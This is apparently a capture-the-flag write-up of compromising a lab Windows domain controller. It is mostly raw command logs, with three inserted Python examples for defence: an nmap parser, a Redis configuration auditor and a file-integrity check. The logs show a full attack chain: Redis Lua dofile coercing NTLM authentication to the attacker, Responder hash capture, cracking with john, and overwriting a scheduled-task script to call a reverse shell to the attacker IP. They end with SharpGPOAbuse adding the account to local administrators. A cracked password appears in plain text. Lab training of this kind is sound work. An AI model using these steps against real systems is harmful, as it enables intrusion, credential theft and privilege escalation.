nmap -sV -p- -Pn 10.10.22.71
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 20:39 EST
Nmap scan report for 10.10.22.71
Host is up (0.086s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
6379/tcp open redis Redis key-value store 2.8.2402
9389/tcp open mc-nmf .NET Message Framing
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.02 seconds
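The scan above is the kind of output a defender should be able to turn into an inventory finding automatically: a domain controller exposing Redis 2.8 is the anomaly that drives the rest of this writeup. The parser below is an added example (not part of the original notes); it reads the port table of an `nmap -sV` report into records and flags open services that fall outside an allow-list of what a Windows DC is expected to serve. The sample input is a trimmed copy of the scan above, and the allow-list `EXPECTED_DC_SERVICES` is the reviewer's own assumption, not something from the page.

```python
import re
from dataclasses import dataclass

# Trimmed copy of the nmap -sV table from the writeup (constructed sample input).
SAMPLE_NMAP_OUTPUT = """\
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
6379/tcp  open  redis         Redis key-value store 2.8.2402
9389/tcp  open  mc-nmf        .NET Message Framing
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One port line: "<port>/<proto> <state> <service> [<version text>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Services a domain controller is normally expected to expose (assumed allow-list).
EXPECTED_DC_SERVICES = {
    "domain", "msrpc", "netbios-ssn", "microsoft-ds", "kpasswd5", "kerberos-sec",
    "ldap", "ssl/ldap", "ldapssl", "globalcatLDAP", "mc-nmf", "ncacn_http", "http",
}


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap(text):
    """Extract PortEntry records from the PORT/STATE/SERVICE/VERSION table."""
    entries = []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if not m:
            continue  # header, "Service Info", "Nmap done", etc.
        port, proto, state, service, version = m.groups()
        entries.append(PortEntry(int(port), proto, state, service, (version or "").strip()))
    return entries


def unexpected_services(entries):
    """Open services whose name (minus nmap's trailing '?' guess marker) is not expected on a DC."""
    return [
        e for e in entries
        if e.state == "open" and e.service.rstrip("?") not in EXPECTED_DC_SERVICES
    ]


if __name__ == "__main__":
    for e in unexpected_services(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(f"review: {e.port}/{e.proto} {e.service} {e.version}")
```

Run against the sample, the only flagged entry is 6379/tcp (Redis), which is exactly the service the rest of the notes pivot on; on a real estate the same rule run over periodic scans catches a key-value store quietly installed on a DC long before anyone points a Lua script at it.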
enum4linux (smb enumeration)
impacket-rpcdump
redis enumeration
Redis version 2.8.2402; the username is enterprise-security
responder (run this in another tab)
redis exploitation
smb credentials capturing
hashcracking
smb enumeration (authenticated)
smbclient
smbmap
nullinux https://github.com/m8sec/nullinux
smbclient
crackmapexec
shell access
Considering the naming of the "PurgeIrrelevantData_1826.ps1" file and the fact that we have READ/WRITE access, that file is probably run by a scheduled task. Download https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1, add "Invoke-PowerShellTcp -Reverse -IPAddress 10.9.191.227 -Port 4321" at the end of the script, and upload it with the name "PurgeIrrelevantData_1826.ps1".
enum4linux-ng -A 10.10.22.71
ENUM4LINUX - next generation (v1.3.2)
==========================
| Target Information |
==========================
[*] Target ........... 10.10.22.71
[*] Username ......... ''
[*] Random Username .. 'emrlcivn'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
====================================
| Listener Scan on 10.10.22.71 |
====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================================
| NetBIOS Names and Workgroup/Domain for 10.10.22.71 |
==========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
========================================
| SMB Dialect Check on 10.10.22.71 |
========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
==========================================================
| Domain Information via SMB session for 10.10.22.71 |
==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: VULNNET-BC3TCK1
NetBIOS domain name: VULNNET
DNS domain: vulnnet.local
FQDN: VULNNET-BC3TCK1SHNQ.vulnnet.local
Derived membership: domain member
Derived domain: VULNNET
========================================
| RPC Session Check on 10.10.22.71 |
========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
==================================================
| Domain Information via RPC for 10.10.22.71 |
==================================================
[+] Domain: VULNNET
[+] Domain SID: S-1-5-21-1405206085-1650434706-76331420
[+] Membership: domain member
==============================================
| OS Information via RPC for 10.10.22.71 |
==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
====================================
| Users via RPC on 10.10.22.71 |
====================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
=====================================
| Groups via RPC on 10.10.22.71 |
=====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
=====================================
| Shares via RPC on 10.10.22.71 |
=====================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
========================================
| Policies via RPC for 10.10.22.71 |
========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
========================================
| Printers via RPC for 10.10.22.71 |
========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 31.42 seconds
sudo responder -I tun0 -dvw
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.9.191.227]
Responder IPv6 [fe80::7589:1b62:606e:6c09]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-ALXRPOCIKFA]
Responder Domain Name [XKFP.LOCAL]
Responder DCE-RPC Port [48193]
[+] Listening for events...
10.10.22.71:6379> EVAL "dofile('C:/Windows/System32/drivers/etc/Hosts')" 0
(error) ERR Error running script (call to f_df72500a0c02a7d5e1d237a6ec4408ed87f17e68): @user_script:1: C:/Windows/System32/drivers/etc/Hosts:2: unexpected symbol near '#'
(0.78s)
10.10.22.71:6379> EVAL "dofile('C:/Users/enterprise-security/Desktop/user.txt')" 0
(error) ERR Error running script (call to f_eebcad8707d6acaa5a1f5511b5d88676a90438d6): @user_script:1: C:/Users/enterprise-security/Desktop/user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e'
Received in redis
EVAL "dofile('//10.9.191.227/test')" 0
(error) ERR Error running script (call to f_22a952acc4988c1dd72b11707328075e3b1081bb): @user_script:1: cannot open //10.9.191.227/test: Permission denied
(0.73s)
Received in responder
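The two Redis steps above depend on three conditions at once: the instance is reachable from the network without a password, `EVAL` (Lua) is callable, and the Windows service runs as a domain account, so a `dofile` against a UNC path makes that account authenticate to whatever host the path names. The auditor below is an added example (not the page's code) that checks a `redis.conf` for the first two conditions and shows the weak configuration beside a hardened one. Both configuration texts are constructed for the example; `protected-mode` only exists from Redis 3.2 onward, so on 2.8 the check simply reports it as absent.

```python
# Constructed redis.conf fragments (not taken from the target). WEAK_CONF mirrors the
# state implied by the writeup: no bind restriction, no password, EVAL available.
WEAK_CONF = """\
# bind 127.0.0.1
port 6379
# requirepass not set
"""

HARDENED_CONF = """\
bind 127.0.0.1
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command EVAL ""
rename-command EVALSHA ""
rename-command CONFIG ""
protected-mode yes
"""


def parse_redis_conf(text):
    """Return (directives, renamed): directive name -> last value, and
    original command -> new name for rename-command lines ('' means disabled)."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition(" ")
        name, value = name.lower(), value.strip()
        if name == "rename-command":
            orig, _, new = value.partition(" ")
            renamed[orig.upper()] = new.strip().strip('"')
        else:
            directives[name] = value
    return directives, renamed


def audit_redis_conf(text):
    """List the exposure conditions the dofile technique above relies on."""
    directives, renamed = parse_redis_conf(text)
    findings = []
    bind = directives.get("bind", "").split()
    if not bind or "0.0.0.0" in bind or "::" in bind:
        findings.append("listens on all interfaces (bind missing or wildcard)")
    if not directives.get("requirepass"):
        findings.append("no requirepass: any client that can reach the port can run commands")
    for cmd in ("EVAL", "EVALSHA"):
        if cmd not in renamed:
            findings.append(f"{cmd} not renamed/disabled: Lua scripting (incl. dofile) is callable")
    if directives.get("protected-mode", "").lower() != "yes":
        findings.append("protected-mode not 'yes' (Redis 3.2+; absent on 2.8)")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["ok"])
```

The third condition, the service account, is not visible in `redis.conf` at all: it is fixed by running Redis as a local, non-domain account with no rights on file shares, and by blocking outbound SMB (445/tcp) from servers to hosts that are not file servers, which turns the captured-hash step into a dropped connection in the firewall log.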
[SMB] NTLMv2-SSP Client : 10.10.22.71
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash : enterprise-security::VULNNET:1473b00d7631333a[...]
haiti 'enterprise-security::VULNNET:1473b00d7631333a[...]'
NetNTLMv2 (vanilla) [HC: 5600] [JtR: netntlmv2]
NetNTLMv2 (NT) [HC: 27100] [JtR: netntlmv2]
john --format=netntlmv2 -w=/usr/share/wordlists/rockyou.txt /home/kali/thm/vulnnetactive/hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sand_0873959498 (enterprise-security)
1g 0:00:00:01 DONE (2024-02-07 21:14) 0.5434g/s 2181Kp/s 2181Kc/s 2181KC/s sandoval69..sand36
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
smbclient -U enterprise-security -L ////10.10.141.42\\
Password for [WORKGROUP\enterprise-security]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.141.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbmap -u enterprise-security -p sand_0873959498 -H 10.10.141.42 --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.141.42:445 Name: 10.10.141.42 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Enterprise-Share READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
nullinux -shares -u enterprise-security -p sand_0873959498 10.10.141.42
Starting nullinux v5.5.0dev | 02-07-2024 21:45
[*] Enumerating Shares for: 10.10.141.42
Shares Comments
-------------------------------------------
\\10.10.141.42\ADMIN$ Remote Admin
\\10.10.141.42\C$ Default share
\\10.10.141.42\Enterprise-Share
\\10.10.141.42\IPC$
\\10.10.141.42\NETLOGON Logon server share
\\10.10.141.42\SYSVOL Logon server share
[*] Enumerating: \\10.10.141.42\Enterprise-Share
. D 0 Wed Feb 7 21:43:27 2024
.. D 0 Wed Feb 7 21:43:27 2024
PurgeIrrelevantData_1826.ps1 A 69 Tue Feb 23 19:33:18 2021
[*] Enumerating: \\10.10.141.42\NETLOGON
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
[*] Enumerating: \\10.10.141.42\SYSVOL
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
vulnnet.local Dr 0 Tue Feb 23 04:29:58 2021
[*] 0 unique user(s) identified
smbclient -I 10.10.141.42 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.141.42\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Feb 7 21:43:27 2024
.. D 0 Wed Feb 7 21:43:27 2024
PurgeIrrelevantData_1826.ps1 A 69 Tue Feb 23 19:33:18 2021
9558271 blocks of size 4096. 5160889 blocks available
smb: \> get PurgeIrrelevantData_1826.ps1
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (3.8 kb/s) (average 1.8 kb/s)
smb: \> exit
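The replacement of PurgeIrrelevantData_1826.ps1 works because a script that a scheduled task executes lives on a share the task's own account can write to. The usual compensating control when that cannot be fixed immediately is integrity monitoring of the script location. The code below is an added example (not part of the writeup) that builds a SHA-256 baseline of a directory and reports modified, added and removed files; `demo()` stages a constructed copy of the scenario in a temporary directory. The file names are the ones from the page; the directory and its contents are created by the example.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path (POSIX separators) -> sha256 for every regular file under root."""
    root = Path(root)
    return {
        str(p.relative_to(root)).replace(os.sep, "/"): sha256_of(p)
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare_baseline(root, baseline):
    """Diff the directory's current state against a stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo():
    """Constructed scenario: a share holding the maintenance script a scheduled task runs."""
    with tempfile.TemporaryDirectory() as share:
        script = Path(share) / "PurgeIrrelevantData_1826.ps1"
        script.write_text("rm -Force C:\\Users\\Public\\Documents\\* -ErrorAction SilentlyContinue\n")
        baseline = build_baseline(share)  # would normally be stored off the share
        # Simulate the script being overwritten and an extra file dropped on the share.
        script.write_text("# replaced content\n")
        (Path(share) / "PowerView.ps1").write_text("# dropped\n")
        return compare_baseline(share, baseline)


if __name__ == "__main__":
    print(demo())
```

The baseline must be kept somewhere the monitored account cannot write, otherwise whoever replaces the script can replace the baseline too; the real fix remains a share ACL that gives the task account read-only access to scripts it executes.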
------------
Get reverse shell
rlwrap nc -lnvp 4321
listening on [any] 4321 ...
ls
connect to [10.9.191.227] from (UNKNOWN) [10.10.69.113] 49909
Windows PowerShell running as user enterprise-security on VULNNET-BC3TCK1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\enterprise-security\Downloads>
Directory: C:\Users\enterprise-security\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/23/2021 2:29 PM nssm-2.24-101-g897c7ad
d----- 2/26/2021 12:14 PM Redis-x64-2.8.2402
-a---- 2/26/2021 10:37 AM 143 startup.bat
PS C:\Users\enterprise-security\Downloads> whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ============================================
vulnnet\enterprise-security S-1-5-21-1405206085-1650434706-76331420-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\Users\enterprise-security\Downloads> netstat -a -p TCP -o
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:88 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:135 VULNNET-BC3TCK1SHNQ:0 LISTENING 992
TCP 0.0.0.0:389 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:445 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:464 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:593 VULNNET-BC3TCK1SHNQ:0 LISTENING 992
TCP 0.0.0.0:636 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3268 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3269 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3389 VULNNET-BC3TCK1SHNQ:0 LISTENING 832
TCP 0.0.0.0:5985 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:6379 VULNNET-BC3TCK1SHNQ:0 LISTENING 384
TCP 0.0.0.0:9389 VULNNET-BC3TCK1SHNQ:0 LISTENING 2276
TCP 0.0.0.0:47001 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:49664 VULNNET-BC3TCK1SHNQ:0 LISTENING 636
TCP 0.0.0.0:49665 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49666 VULNNET-BC3TCK1SHNQ:0 LISTENING 1028
TCP 0.0.0.0:49667 VULNNET-BC3TCK1SHNQ:0 LISTENING 836
TCP 0.0.0.0:49669 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49670 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49684 VULNNET-BC3TCK1SHNQ:0 LISTENING 2232
TCP 0.0.0.0:49694 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
TCP 0.0.0.0:49699 VULNNET-BC3TCK1SHNQ:0 LISTENING 752
TCP 0.0.0.0:49710 VULNNET-BC3TCK1SHNQ:0 LISTENING 2352
TCP 10.10.69.113:53 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
TCP 10.10.69.113:139 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 10.10.69.113:389 VULNNET-BC3TCK1SHNQ:49704 ESTABLISHED 764
TCP 10.10.69.113:389 VULNNET-BC3TCK1SHNQ:49708 ESTABLISHED 764
TCP 10.10.69.113:49704 VULNNET-BC3TCK1SHNQ:ldap ESTABLISHED 2352
TCP 10.10.69.113:49708 VULNNET-BC3TCK1SHNQ:ldap ESTABLISHED 2352
TCP 10.10.69.113:49909 ip-10-9-191-227:4321 ESTABLISHED 3968
TCP 10.10.69.113:49986 VULNNET-BC3TCK1SHNQ:49669 TIME_WAIT 0
TCP 127.0.0.1:53 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
------------------------------
Get powerview and upload it
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
--2024-02-08 13:34:20-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’
PowerView.ps1 100%[============================================================================>] 752.23K 2.60MB/s in 0.3s
2024-02-08 13:34:21 (2.60 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> put PowerView.ps1
putting file PowerView.ps1 as \PowerView.ps1 (759.1 kb/s) (average 759.1 kb/s)
---------
Import module
PS C:\Users\enterprise-security\Downloads> Import-Module C:\Enterprise-Share\PowerView.ps1
PS C:\Users\enterprise-security\Downloads> Get-DomainGPO
usncreated : 5672
systemflags : -1946157056
displayname : security-pol-vn
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 2/23/2021 11:09:44 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 20506
dscorepropagationdata : {2/23/2021 11:08:53 PM, 2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated : 2/23/2021 9:30:33 AM
versionnumber : 3
instancetype : 4
objectguid : 9d593bf2-13ac-4df7-97a9-faff2abd3e2c
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
usncreated : 5675
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 2/24/2021 12:14:52 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 24594
dscorepropagationdata : {2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags : 0
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated : 2/23/2021 9:30:33 AM
versionnumber : 4
instancetype : 4
objectguid : 71ee1493-0079-40b4-80f0-8ba42c4f61d5
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
-------------------
smbclient -I 10.10.49.44 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.49.44\sysvol'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
vulnnet.local Dr 0 Tue Feb 23 04:29:58 2021
9558271 blocks of size 4096. 5157762 blocks available
smb: \> cd vulnnet.local\Policies
smb: \vulnnet.local\Policies\> ls
. D 0 Tue Feb 23 04:30:37 2021
.. D 0 Tue Feb 23 04:30:37 2021
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Tue Feb 23 04:30:37 2021
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Tue Feb 23 04:30:37 2021
9558271 blocks of size 4096. 5157753 blocks available
smb: \vulnnet.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Tue Feb 23 04:30:37 2021
.. D 0 Tue Feb 23 04:30:37 2021
GPT.INI A 22 Tue Feb 23 04:36:27 2021
MACHINE D 0 Tue Feb 23 16:58:25 2021
USER D 0 Tue Feb 23 04:30:37 2021
PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "makemeadmin" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN" --Force
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Modifying \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
